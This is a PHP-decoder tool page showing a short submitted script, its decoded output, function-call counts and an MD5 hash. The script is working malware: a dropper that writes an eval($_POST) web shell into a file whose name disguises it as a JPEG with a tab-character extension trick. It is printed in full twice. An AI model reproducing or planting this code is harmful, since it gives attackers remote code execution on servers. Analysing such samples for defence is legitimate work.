Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $webpath = dirname(__FILE__)."/"; $a="<?php @eval("."$"."_POST"."[rcoil]);?>"; file_..
Decoded Output download
<?php
$webpath = dirname(__FILE__)."/";
$a="<?php @eval("."$"."_POST"."[rcoil]);?>";
file_put_contents($webpath ."test.jpg".chr(9).".php", $a);
?> //test.jpg%09.php
Did this file decode correctly?
Original Code
<?php
$webpath = dirname(__FILE__)."/";
$a="<?php @eval("."$"."_POST"."[rcoil]);?>";
file_put_contents($webpath ."test.jpg".chr(9).".php", $a);
?> //test.jpg%09.php
Function Calls
chr | 1 |
dirname | 1 |
file_put_contents | 1 |
Stats
MD5 | 0f2ce2e5c797c390ab939abe1c0190ad |
Eval Count | 0 |
Decode Time | 90 ms |